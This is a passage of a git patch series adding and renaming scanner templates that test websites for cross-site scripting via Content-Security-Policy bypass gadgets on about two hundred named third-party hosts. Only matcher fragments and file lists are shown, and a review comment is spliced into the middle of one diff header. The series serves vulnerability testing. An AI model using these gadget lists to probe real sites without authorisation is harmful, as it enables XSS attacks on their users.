+ part: content_type
+ words:
+ - "text/html"
+
+ - type: word
+ part: content_security_policy
+ words:
+ - "acs.youku.com"
+ - "script-src"
+ condition: and
\ No newline at end of file
From ac20aef99925e7e7034aecaed4f31008a5df6617 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 28 Jan 2025 14:16:22 +0530
Subject: [PATCH 08/10] fix lint
---
 dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
index 58696b4a0e8..3b0a14968b5 100644
--- a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
@@ -44,4 +44,4 @@ http:
 words:
 - "anchor.digitalocean.com"
 - "script-src"
- condition: and
\ No newline at end of file
+ condition: and
\ No newline at end of file
From 93fa7a1003c0990ba822ff455a6e4c8b3aacf493 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 28 Jan 2025 14:54:03 +0530
Subject: [PATCH 09/10] fix-issue
---
 dast/vulnerabilities/xss/csp/youku-csp-xss.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
index 46995f26343..0e02b5cfb9b 100644
--- a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
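Review bot: The reference is the unpinned `blob/main/data.tsv`, whereas the sibling templates in this series cite a commit hash with line anchors (`blob/0b4c8aee…/data.tsv#L…`); as the dataset is edited the claim for `acs.youku.com` becomes unverifiable, so pin it the same way, `- https://github.com/renniepak/CSPBypass/blob/<commit>/data.tsv#L<line>`. Separately, the `injection` payload renders as `''` here; if that is the committed value rather than a display artifact, `words: - "{{injection}}"` on the body is an empty-string match that every HTML response with a matching policy satisfies. The payload and the gadget on `acs.youku.com` it relies on should be stated in the file (a one-line `description` under `info`) so the finding can be reviewed without consulting the external dataset.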
+++ b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
@@ -44,4 +44,4 @@ http:
 words:
 - "acs.youku.com"
 - "script-src"
- condition: and
\ No newline at end of file
+ condition: and
From f5aa19bc28737fa4b5ee590a510749f0c9c8ff14 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran Date: Thu, 30 Jan 2025 17:46:05 +0530 Subject: [PATCH 10/10] CSP DAST Templates final --- .../xss/csp/1688-bebezoo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/360cn-csp-xss.yaml | 47 --------------- ...p-xss.yaml => aliexpress-acs-csp-xss.yaml} | 38 ++++++++----- .../xss/csp/amazon-aax-eu-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/amazon-csp-xss.yaml | 51 ----------------- .../xss/csp/app-link-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/baidu-map-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/bazaarvoice-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/bdimg-apps-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/bing-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cas-criteo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cdn-arkoselabs-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cdn-jsdelivr-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cdn-shopify-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cdn-syncfusion-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cdnjs-cloudflare-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/challenges-cloudflare-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/chartbeat-api-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/client-api-arkoselabs-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/client-crisp-chat-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/clients1-google-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/code-angularjs-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/commerce-coinbase-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/common-like-naver-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/connect-mail-ru-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/content-akamai-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cse-google-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/cxense-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/d-adroll-csp-xss.yaml | 55 ++++++++++++++++++ .../d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml | 55 ++++++++++++++++++ 
.../xss/csp/dailymotion-api-csp-xss.yaml | 55 ++++++++++++++++++ .../vulnerabilities/xss/csp/dblp-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/demo-matomo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/dev-virtualearth-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/developer-apple-csp-xss.yaml | 55 ++++++++++++++++++ ....yaml => digitalocean-anchor-csp-xss.yaml} | 36 +++++++----- ...tation-resources-opendatasoft-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/don-bild-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/dpm-demdex-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/duckduckgo-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/dynamic-criteo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/elysiumwebsite-s3-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/eu-battle-net-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/facebook-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/facebook-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/fast-wistia-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/flickr-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/forismatic-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/forms-hsforms-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/forms-hubspot-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/fwmrm-csp-xss.yaml | 38 ++++++++----- .../xss/csp/geo-moatads-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/geolocation-onetrust-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/getdrip-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/gist-github-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/github-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/global-apis-naver-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/go-dev-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/go-snyk-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/google-accounts-csp-xss.yaml | 36 +++++++----- .../xss/csp/google-ajax-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/google-analytics-csp-xss.yaml | 55 ++++++++++++++++++ 
.../xss/csp/google-apis-csp-xss.yaml | 56 ++++++++++++++++++ .../xss/csp/google-csp-xss.yaml | 51 ----------------- .../xss/csp/googleapis-csp-xss.yaml | 51 ----------------- .../xss/csp/graph-facebook-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/grubhub-assets-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/gstatic-angular-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/gstatic-csp-xss.yaml | 47 --------------- .../xss/csp/gstatic-recaptcha-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/gum-criteo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/hatenaapis-bookmark-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/hcaptcha-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/help-afterpay-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ib-adnxs-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/info-cloudflare-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/info-elastic-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/inno-blob-core-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/investor-coinbase-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ipify-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ipinfo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/itunes-apple-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/jd-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/js-hcaptcha-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/js-smb-ovoenergy-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/kbcprod-service-now-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/lghnh-mkt-prod1-adobe-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/lijit-ap-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/linkedin-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/links-disqus-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/livechatinc-api-csp-xss.yaml | 55 ++++++++++++++++++ ...-xss.yaml => lpsnmedia-accdn-csp-xss.yaml} | 38 ++++++++----- .../xss/csp/lptag-liveperson-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/m-media-amazon-csp-xss.yaml | 55 ++++++++++++++++++ 
.../xss/csp/mango-buzzfeed-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/maps-api-ssl-google-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/maps-google-com-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/maps-google-de-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/maps-google-lv-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/maps-google-ru-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/maps-googleapis-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/marketo-app-sjint-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/mc-yandex-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/meetup-api-csp-xss.yaml | 55 ++++++++++++++++++ dast/vulnerabilities/xss/csp/mi-csp-xss.yaml | 47 --------------- .../xss/csp/mi-huodong-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/microsoft-translator-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/mixpanel-api-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/nominatim-openstreetmap-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/oamssoqae-ieee-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/olark-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/openexchangerates-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ovoenergy-csp-xss.yaml | 47 --------------- .../xss/csp/page-gitlab-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/partner-googleadservices-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/passport-baidu-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/pinterest-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/pixel-mathtag-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/pixel-quantserve-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/pixplug-csp-xss.yaml | 46 --------------- .../xss/csp/portal-ayco-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/pubads-doubleclick-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/public-api-wordpress-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/qq-c-y-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/query-fqtag-csp-xss.yaml | 55 ++++++++++++++++++ 
.../xss/csp/r-skimresources-csp-xss.yaml | 55 ++++++++++++++++++ ...cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/recaptcha-net-csp-xss.yaml | 1 + .../rentokil-domains-firebaseio-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/reveal-clearbit-csp-xss.yaml | 55 ++++++++++++++++++ .../vulnerabilities/xss/csp/ring-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/romania-amazon-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/s-fqtag-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/s-ytimg-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/search-yahoo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/secure-adnxs-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/secure-gravatar-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/secure-quantserve-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/securepubads-doubleclick-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/segapi-quantserve-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/server-ethicalads-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/servicenow-csp-xss.yaml | 47 --------------- .../xss/csp/shop-samsung-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/skype-config-csp-xss.yaml | 57 +++++++++++++++++++ .../csp/smartcaptcha-yandexcloud-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/social-yandex-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/sogou-csp-xss.yaml | 47 --------------- .../xss/csp/soundcloud-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/srv-carbonads-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ssl-gstatic-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/sso-bytedance-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/st3-zoom-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/stackexchange-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/static-parastorage-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/storage-googleapis-csp-xss.yaml | 55 ++++++++++++++++++ .../storemapper-herokuapp-fastly-csp-xss.yaml | 55 ++++++++++++++++++ 
.../xss/csp/suggest-taobao-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/suggestqueries-youtube-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/support-zendesk-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/swiftype-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/sync-im-apps-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/tagmanager-google-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/tcr9i-openai-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/thehive-shopify-csp-xss.yaml | 55 ++++++++++++++++++ .../thiscanbeanything-zendesk-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/tiktok-analytics-csp-xss.yaml | 34 ++++++----- .../xss/csp/translate-google-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/translate-googleapis-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/translate-yandex-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/tumblr-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/twitter-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/twitter-csp-xss.yaml | 55 ++++++++++++++++++ ...zp-public-blob-vercel-storage-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ug-alibaba-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/uk-indeed-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/ulogin-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/unpkg-angular-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/unpkg-hyperscript-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/urs-pbs-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/vimeo-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/virtualearth-csp-xss.yaml | 47 --------------- .../xss/csp/visitor-pixplug-csp-xss.yaml | 55 ++++++++++++++++++ .../visitor-service-tealiumiq-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/vk-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/wb-amap-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/widget-usersnap-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/widgets-pinterest-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/wikipedia-csp-xss.yaml | 55 
++++++++++++++++++ .../xss/csp/wordpress-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/wordpress-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/wse-api-here-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-ancestrycdn-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-api-ibm-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-bing-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-blogger-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-google-analytics-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-google-recaptcha-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-google-search-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/www-googleapis-blogger-csp-xss.yaml | 55 ++++++++++++++++++ .../www-googleapis-customsearch-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-googletagmanager-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-gstatic-angular-csp-xss.yaml | 55 ++++++++++++++++++ .../csp/www-gstatic-recaptcha-csp-xss.yaml | 55 ++++++++++++++++++ ...sp-xss.yaml => www-meteoprog-csp-xss.yaml} | 38 ++++++++----- .../xss/csp/www-microsoft-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-paypal-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-recaptcha-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-reddit-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-roblox-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-st-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-yastat-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-yastatic-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/www-youtube-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/x-api-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/yahoo-ads-yap-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/yandex-st-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/youku-csp-xss.yaml | 47 --------------- .../xss/csp/youtube-csp-xss.yaml | 41 +++++++------ .../xss/csp/yuedust-yuedu-csp-xss.yaml | 55 ++++++++++++++++++ ...ugiohmonstrosdeduelo-blogspot-csp-xss.yaml | 
55 ++++++++++++++++++ .../xss/csp/zhike-help-360-csp-xss.yaml | 55 ++++++++++++++++++ .../xss/csp/zhuanjia-sogou-csp-xss.yaml | 55 ++++++++++++++++++ 222 files changed, 11240 insertions(+), 693 deletions(-) create mode 100644 dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml rename dast/vulnerabilities/xss/csp/{aliexpress-csp-xss.yaml => aliexpress-acs-csp-xss.yaml} (51%) create mode 100644 dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml create mode 100644 
dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml rename dast/vulnerabilities/xss/csp/{digitalocean-csp-xss.yaml => digitalocean-anchor-csp-xss.yaml} (54%) create mode 100644 dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml create mode 100644 
dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/google-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml create mode 100644 
dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml rename dast/vulnerabilities/xss/csp/{lpsnmedia-csp-xss.yaml => lpsnmedia-accdn-csp-xss.yaml} (50%) create mode 100644 dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml delete mode 100644 
dast/vulnerabilities/xss/csp/mi-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml create mode 